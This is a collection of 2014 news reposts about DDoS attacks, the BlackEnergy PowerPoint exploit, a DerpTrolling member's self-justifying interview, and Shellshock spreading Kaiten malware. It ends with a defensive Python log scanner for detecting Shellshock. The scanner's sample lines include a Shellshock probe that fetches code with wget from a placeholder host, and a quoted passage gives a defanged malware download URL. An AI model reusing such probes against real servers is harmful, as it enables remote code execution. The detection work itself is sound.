As cyber-criminals innovate and develop new techniques to defeat defensive methods, it has never been more important for information security professionals to have strong, proactive defense and remediation strategies in place. During this webinar, the speakers will share insight on how to address the risks and respond to attacks:
- Hear about the evolution of and motivations behind DDoS attacks and the attack vectors exploited
- Discover how to implement multi-layered DDoS defense
- Identify best-practice detection and classification techniques
- Discover how to implement resilient DDoS incident response practices
Date: November 12th 2014
Time: 10:00AM EST/15:00 GMT
Ukraine’s election commission website has been attacked by hackers on the eve of the country’s parliamentary polls. According to Ukrainian officials, the website came under cyber attack on Saturday, just one day before Ukraine is set to hold general elections. “There is a DDoS attack on the commission’s site,” said the Ukrainian government information security service. A distributed denial-of-service (DDoS) attack slows down or disables a website by flooding it with communications requests. The security service labeled the attack as “predictable” and went on to say that the website’s design ensures that it could not be completely taken down and that it is currently completely functional. “If a site runs slowly, that doesn’t mean it has been destroyed by hackers,” the statement added. As for reports that the site was under the control of hackers, Markiyan Lubkivskyy, an adviser to the Ukrainian Security Service, said, “Any statements regarding the alleged successful unauthorized intrusions into the cyber space of the Central Election Commission or the elements of the elections systems do not correspond to the facts. Hackers are controlling nothing.” Ukraine’s snap elections were called in August as President Petro Poroshenko came under pressure to purge the parliament of lawmakers allegedly tied to the overthrown government of Viktor Yanukovych. As many as 36 million Ukrainians are eligible to take part in the parliamentary elections. The leaders of the breakaway eastern regions of Donetsk and Lugansk have refused to allow the polls to be held in territories under their control, with a population of almost three million. Ukraine’s mainly Russian-speaking regions in the east have been the scene of deadly clashes between pro-Russia protesters and the Ukrainian army since the government in Kiev launched military operations in mid-April in a bid to crush the protests. Source: http://www.presstv.ir/detail/2014/10/25/383623/ukraines-election-website-hacked/
As the Director of Sales for DOSarrest Internet Security I have the opportunity to speak with many prospects looking for a DDoS protection service for their corporate website. What I have learned is that there are many competitors offering what I would call a “bare bones vanilla offering”. Some offer a free service, or a service ranging in price from $200 – $300/month. These plans offer very basic protection. They also advertise an Enterprise offering that has an expensive starting point and can really turn into being quite costly depending on your circumstances. The Enterprise service is the offering that any company that is serious about protecting their website should consider. There are a few issues with each of these offerings that I’d like to point out. These competitors claim they have a very large number of clients utilizing their services but fail to mention that 80-85% of them are using their free service. Roughly 10-15% of their customers are using their $200-$300/month service which again is really just a basic protection with limited protection capabilities. When a company witnesses a large attack, which is completely out of their control, they are told they should upgrade to their enterprise offering. I hear from prospects quite often that this $200 – $300/month service does not offer adequate protection nor customer support. In most cases there is no phone support included at all! Also, they will charge the client based on the size of the attack. How can a client control the size of an attack they are experiencing? This uncertainty makes it virtually impossible for a company to budget costs. Let’s not be mistaken, their goal is to get you onto their Enterprise offering which will cost you in excess of a thousand dollars per month. Alternatively, at DOSarrest Internet Security we offer a single Enterprise level service for all of our clients. The service includes full telephone and email access to our 24/7 support team.
This provides you direct access to system experts. We do not operate a tiered support service given the criticality of the service. Also, we protect our clients from all DDoS attacks regardless of size without the need to pay us additional fees depending on the size of an attack. We also include an external monitoring account with our service called DEMS, which stands for DOSarrest External Monitoring Service. This allows our 24/7 support team to monitor your website from 8 sensors in 4 geographical regions. We proactively inform our clients if we notice any issues with their website. Most of our competitors do not offer this service and if they do it is not included free of charge to their clients. DOSarrest has been providing DDoS protection services since 2007. Globally we were one of the very first DDoS protection providers and have successfully mitigated thousands of real world attacks. This is not an “add on product” for us. Our team has the experience and the protection of a client’s website is our #1 priority. Please visit our newly revamped website and take a look at the testimonials page to see what some of our current customers are saying about their experience with us. Please feel free to reach out to me directly or anyone on our sales team at email@example.com for further information on our service. Brian Mohammed, Director of Sales for DOSarrest Internet Security LTD.
See original article:
The DDoS Protections Services Landscape
A basic premise of a democratic society gives its citizens the right to participate in debate and effect change by taking to the streets to demonstrate. In the U.S., this is enshrined in the Bill of Rights under the First Amendment. But what happens when we all effectively live, work, shop, date, bank and get into political debates online? Because online, as Molly Sauter points out in her book The Coming Swarm, there are no streets on which to march. “Because of the densely intertwined nature of property and speech in the online space, unwelcome acts of collective protest become also acts of trespass.” Sauter argues that distributed denial of service (DDoS) attacks are a legitimate form of protest, or at least one that needs to be examined in the larger context of lawful activism, rather than hastily and disastrously criminalized under the Patriot Act. Sauter is currently doing her Ph.D. at McGill University in Montreal after completing her Masters at MIT. Prior to attending MIT she worked as a researcher at the Berkman Center for Internet and Society at Harvard. So she’s been thinking about civil disobedience and digital culture for a while, although she admitted during a recent phone interview that “adapting and re-writing a Masters thesis into a book during the first year of doctorate study is not recommended.” As Sauter examines in The Coming Swarm, DDoS campaigns are not new. In fact they’ve been used for almost 20 years in support of various political movements, from pro-Zapatista mobilization to immigration policy in Germany and, most notably, at the 2010 G20 in Toronto. “Guiding this work is the overarching question of how civil disobedience and disruptive activism can be practiced in the current online space,” she told PCMag. “Actions that take place in the online sphere can only ever infringe on privately held property.
The architecture of the network does not, as of yet, support spaces held in common.” The book also delves into extensive technical discussion on the evolution of simple denial-of-service attacks, where a single computer and Internet connection breaches a firewall, floods a server with packets, and overloads the system so that it malfunctions and shuts down. According to Sauter, it was the switch to distributed denial-of-service attacks that really got the authorities’ attention, mainly because the distributed nature of the attack, using zombie machines to hide the activists’ original IP addresses and often involving malware, made detection almost impossible. It was then that the nature of digital debate was re-framed as a criminal act rather than civil disobedience. Source: http://www.pcmag.com/article2/0,2817,2469400,00.asp
The ‘Patch Tuesday’ fixes included a patch for a vulnerability that a Russian hacker team was using to target NATO. These attacks target high-profile organizations, so you don’t have much of a reason to be worried (but please update!). So, no need to panic; this is just an interesting scenario that sheds some light on how computers can be compromised. The Russian team is called ‘Sandstorm Team’ and has been targeting organizations in Russia, the European Union, and the United States since 2009. This attack used malicious PowerPoint documents. The Sandstorm Team crafted these PowerPoint files to install malware called ‘Black Energy’ when opened. The malware installed is ‘bot-based’ and uses a plugin architecture that can be used for Distributed Denial of Service (DDoS) attacks, credential theft, or spam. Then, in a ‘spear-phishing’ attack, they sent these files to the employees of NATO and different telecom and energy companies. A ‘spear-phishing’ attack is when the attacker pretends to be a trustworthy source to trick the victim into opening malicious files, in this case PowerPoint files which installed malware. Normally, you don’t want to run exe files that you don’t trust, as they execute unrestricted code. But a PowerPoint file should just open in PowerPoint, so it’s safe, right? Wrong. You should never open files that are from questionable sources. This particular attack used a vulnerability in OLE that allowed the attacker to execute any command, which was used to install the malware through the mere opening of the PowerPoint file. OLE stands for Object Linking and Embedding, and is used in cases such as linking an Excel report in a PowerPoint document. This way, when the Excel report is updated, so is the data that shows up in the PowerPoint. It is a very useful feature, but the attackers found a vulnerability that lets them use it to install malware. This vulnerability in OLE has now been patched.
This was a ‘zero-day’, an attack in which the attacker finds a vulnerability first and is able to exploit it before anyone has any knowledge about it, let alone has a chance to fix it. These types of attacks happen all the time, and the only way to fix one is to detect the malware exploiting it and then patch the vulnerability. To help ensure the safety of your own system, don’t click on anything you don’t trust, and install updates as soon as possible. Source: http://www.winbeta.org/news/how-russian-hackers-used-microsoft-powerpoint-files-hack-nato-computers
See the original post:
How Russian hackers used Microsoft PowerPoint files to hack NATO computers
Internet portal InSerbia News was unavailable on Saturday for a few hours due to a DDoS attack. The attack was carried out from IP addresses in ranges that belong to internet providers in Serbia, which indicates that the attack was not performed using “infected” computers (a botnet) throughout the world, but that it was an organized and maybe coordinated attack using only computers from Serbia. InSerbia wrote on October 7th about the “Valter” program, which could also have been used for an attack on the InSerbia portal. The way the network of people who use “Valter” is organized, and the fact that all of them are from Serbia, increases the suspicion that the same software was used against us this time. Because of the situation we are forced to block all IP addresses from Serbia, so visitors from this country must pass a “Captcha” check before they enter the website. We apologize to our readers for this measure. After blocking access to IP addresses from Serbia, the server continued to function normally. At the moment this article is being written (4pm CEST), the attack is still in progress. Source: http://inserbia.info/today/2014/10/inserbia-news-under-ddos-attack-from-serbia/
Read the article:
InSerbia News under DDoS attack from Serbia
DDoS attacks are a way to keep corrupt corporations honest, according to an anonymous member of DerpTrolling, who gives us an inside look at the self-proclaimed gods of the Internet. The man behind the curtain One of the first things he says is that he absolutely cannot offer proof. This makes a disappointing amount of sense: he is a self-confessed DDoS troll, a member of the infamous group DerpTrolling. Since distributed denial-of-service attacks could be considered a federal crime under US law — and, indeed, are an offence in many locations around the globe, including the UK and Australia — he, understandably, won’t give a name, location or even rough age. As a corollary, we have no way of knowing that he is who he says he is. We’ll call him Incognito. To talk to him, we plug into a private chat session from opposite sides of the globe (as indicated by time zones) using an encrypted Chrome add-on. “I’ve seen Anonymous at its best,” he tells us. “I participated in their major DDoS attacks against Visa and PayPal, although the role DerpTrolling played in those attacks is pretty much unknown. I’ve seen the rise and fall of LulzSec. So let’s just say I am old enough to know how to stay hidden.” One thing is clear from the outset: Incognito believes that what DerpTrolling does is for the good of everyone. “DerpTrolling as a group shows the world, particularly the gaming community, how big companies and corporations such as Riot or Blizzard only care about money,” he explains. “Our methods are forcing big companies and corporations to upgrade their servers and make sure their clients are their top priority.” DerpTrolling has been around since 2011 or so, and Incognito has been a member since the beginning. Its method of attack, as mentioned above, is DDoS — overloading servers with external communication requests, rendering the target systems unusable for a period of time.
DerpTrolling has attacked several high-profile servers over the years, including those of League of Legends, World of Tanks, EVE Online, DoTA 2, Blizzard, RuneScape and, more recently, Xbox Live and the Nintendo Web store. Although their actions may appear inscrutably juvenile and unwarranted — done for, as the saying goes, the lulz — the team identifies rather strongly with Richard Stallman’s assessment of DDoS as a form of protest against what it perceives as a callous disregard for gamers on the part of games publishers. “A company that doesn’t care only for money would make the effort, which includes time and money, to make sure their servers aren’t able to be crippled by a simple DDoS attack,” Incognito said. “We decided to take action because, if we had the capability to stop corporate greed and we did nothing, that in itself is a crime. We thought DDoS attacks were appropriate because they do not affect customers in a monetary way, unlike leaking data — although we are not opposed to leaking data.” Lines in the sand He is careful to point out that DerpTrolling is against doxxing — that is, the leaking of information about a specific individual, such as address, phone number, Social Security number, credit card and bank account details — and swatting, a term for calling the police to the home of said doxxed individual for spurious reasons. In one of the most famous incidents involving the group, though, one particular individual was doxxed and swatted — Twitch streamer PhantomL0rd. While DerpTrolling was attacking Battle.net, EA.com, Club Penguin and Riot, it was allegedly because those were games PhantomL0rd was playing. At some point during the DDoS activities, PhantomL0rd was doxxed on several gaming websites — and then someone called the police to his home, accusing the streamer of holding five people hostage. 
Incognito is cagey about the incident, and won’t comment on why the group targeted PhantomL0rd or what precisely DerpTrolling did do — only saying that there is no hard evidence connecting DerpTrolling to the actions. “Yes, Phantoml0rd was doxxed and swatted,” he said. “But we never threatened to harm him physically and we have never taken credit for that attack.” “We decided to take action because, if we had the capability to stop corporate greed and we did nothing, that in itself is a crime.” Incognito He seems determined to impress that there are lines DerpTrolling won’t cross — that what the group does, it does for the good of all. As an example, he mentions that the group is sitting on what could have been a significant customer data leak. “We are currently in possession of over 800,000 usernames and passwords from the 2K gaming studio. As of right now, our members as a whole have decided that leaking data is not what we do, and therefore we will not leak such damaging data,” he said, adding that he had contacted 2K to inform the publisher of the vulnerability in its system — and received no response. “I personally contacted them over a month ago. I did not send them an anonymous letter, I made sure they understood exactly who I was. And offered plenty of proof.” Unless the data is actually leaked, he believes that gaming companies are unlikely to spend the money to issue a fix. CNET has contacted 2K for comment and will update when we receive a reply. Incognito also goes out of his way to dissociate DerpTrolling’s activities from those of LizardSquad, the group that claimed responsibility for calling a bomb threat on a plane carrying Sony Online Entertainment president John Smedley. “I want to make it absolutely clear that DerpTrolling is in no way affiliated with LizardSquad,” he said. Although LizardSquad had requested that the two groups work together, DerpTrolling had refused, he said. 
“LizardSquad is run by an extremist hacker who has close ties to UGNazi. You could say that the ISISGang is the elite ‘leaders’ of LizardSquad. We have no wish to associate with any individual or group that has ties with such extremists.” ISISGang has been accused of making prank calls that see their targets swatted and posing as Middle Eastern terrorists, while UGNazi is allegedly responsible for several doxxings and data leaks. Incognito seems quite firm that DerpTrolling wishes to commit no actual harm. The end and the means DerpTrolling has more up its sleeve. Attacks on Xbox Live and the Nintendo Web store on Saturday, September 28 were a “test fire” for “upcoming attacks”, Incognito says — although he won’t go into any further detail about that. Nor is it easy to guess who the targets might be. DerpTrolling allows the community to select targets much of the time, Incognito said, via text or tweet. The fact that sometimes the attacks achieve a result justifies the work in his view; Incognito says that League of Legends and Xbox Live have both upgraded their servers in response to DerpTrolling DDoS attacks — in spite of negative public opinion. “Children do not know what is best for them. We are basically the Gods of the Internet, we know what is best for them.” Incognito “The public will always have an opinion that is based on what the media feeds them,” he says. “Children do not know what is best for them. We are basically the Gods of the Internet, we know what is best for them.” When asked if DDoS is a snake chasing its own tail — that is, if no one engaged in DDoS attacks, then companies would not have to dedicate resources to protecting against them — he once again pleads no comment.
There is a condition under which DerpTrolling will cease operations: “If the presidents of Sony and Microsoft will wear a shoe on their heads, then DerpTrolling will disband and we will not attack any more servers.” As for Incognito himself, we suspect he might be around for a long time. When asked if he himself would ever hang up his hat, he seems baffled by the question. “Why would I want to stop?” Source: http://www.cnet.com/au/news/the-gods-of-the-internet/
Hackers are exploiting the Shellshock bug to infect numerous systems, including Apple Mac OS X, with a distributed denial-of-service (DDoS) malware known as Kaiten. Security researchers from Trend Micro reported uncovering the campaign in a blog post, warning that it has the potential to inflict devastating DDoS attacks. “We found that one of the payloads of Bash vulnerabilities, which we detect as TROJ_BASHKAI.SM, downloaded the source code of Kaiten malware, which is used to carry out denial-of-service attacks,” read the post. “Kaiten is old IRC-controlled DDoS malware and, as such, there is a possibility that the attackers employed Shellshock to revive its old activities like DDoS attacks to target organisations.” Discovered earlier in September, Shellshock is a critical vulnerability in the Bash code used by Unix and Unix-like systems. Trend Micro listed the new attack’s ability to infect Mac OS systems as being particularly troubling, highlighting it as evidence that hackers are using Shellshock to expand the victim-base of their campaigns. “Typically, systems infected with Shellshock payloads become a part of their botnet, and therefore can be used to launch DDoS attacks. In addition, the emergence of a downloaded file that targets Mac OS clearly shows that attackers are broadening their target platform,” the security firm said. Trend Micro added that the threat is doubly dangerous as Apple had mistakenly told its users that most should be safe by default. “Users who configured to enable the Advanced Unix Services are still affected by this vulnerability,” read the post. “The Advanced Unix services enables remote access via Secure Shell which offers ease of access to system or network administrators in managing their servers. 
This service is most likely enabled for machines used as servers such as web servers, which are the common targets of Shellshock attacks.” Apple released security patches to plug Shellshock for its OS X Mavericks, Lion and Mountain Lion operating systems in September. The Trend Micro researchers added that IT managers should be on guard for the attack as it has advanced detection-dodging capabilities. “When it connects to http://www[dot]computer-services[dot]name/b[dot]c, it downloads the Kaiten source code, which is then compiled using the common gcc compiler. This means that once connected to the URL, it won’t immediately download an executable file,” explained the researchers. “This routine could also be viewed as an evasion technique as some network security systems filter out non-executable files from scanning, due to network performance concerns. Systems configured this way may skip the scanning of the source code because it’s basically a text file.” The Kaiten attack is one of many recently discovered campaigns using Shellshock. Researchers from FireEye caught hackers exploiting the Shellshock Bash vulnerability to infect enterprise Network Attached Storage systems with malware at the end of September. Source: http://www.v3.co.uk/v3-uk/news/2374038/hackers-using-shellshock-to-spread-kaiten-mac-os-ddos-malware
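Added example, not code from the Trend Micro write-up or from this post: a small Python scanner that flags Shellshock probes in web-server log lines and notes when the payload fetches a `.c` source file rather than a binary, the staging behaviour the researchers describe above. The combined log format, the two heuristics and the sample log lines are assumptions constructed for this illustration.

```python
import re
from urllib.parse import unquote

# Shellshock probes plant a Bash function definition ("() {") in a request
# field that a CGI handler will export as an environment variable, typically
# User-Agent or Referer. The pattern tolerates whitespace variants.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")

# Assumed "combined" access log format (Apache/nginx style):
# ip ident user [timestamp] "request" status bytes "referer" "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Heuristic for the "download source, compile locally" stage described on
# the page: a fetch of a .c file, which executable-only scanners may skip.
SOURCE_FETCH_RE = re.compile(r"\b(?:wget|curl)\b[^;]*?\.c\b")


def inspect_line(line):
    """Return a dict describing a suspicious request, or None for benign lines."""
    m = COMBINED_RE.match(line.rstrip("\n"))
    if not m:
        return None  # unparseable line; a real pipeline would count these
    fields = m.groupdict()
    for name in ("req", "ref", "ua"):
        # Decode once so percent-encoded payloads do not slip past the regex.
        decoded = unquote(fields[name])
        if SHELLSHOCK_RE.search(decoded):
            return {
                "ip": fields["ip"],
                "field": name,
                "fetches_source": bool(SOURCE_FETCH_RE.search(decoded)),
            }
    return None


def scan(lines):
    """Run inspect_line over an iterable of log lines and keep the hits."""
    return [hit for hit in (inspect_line(l) for l in lines) if hit]


# Constructed sample log lines (documentation/reserved addresses only).
SAMPLE_LOG = [
    # benign request
    '203.0.113.5 - - [10/Oct/2014:12:00:01 +0000] "GET /index.html HTTP/1.1" '
    '200 512 "-" "Mozilla/5.0"',
    # constructed probe in the User-Agent; the command itself is elided
    '198.51.100.7 - - [10/Oct/2014:12:00:02 +0000] "GET /cgi-bin/status HTTP/1.1" '
    '200 0 "-" "() { :; }; ELIDED_COMMAND"',
    # constructed percent-encoded probe in the Referer that fetches a .c file
    '198.51.100.9 - - [10/Oct/2014:12:00:03 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" '
    '200 0 "%28%29%20%7B%20%3A%3B%20%7D%3B%20wget%20http%3A%2F%2Fexample.invalid%2Fb.c" '
    '"curl/7.30"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```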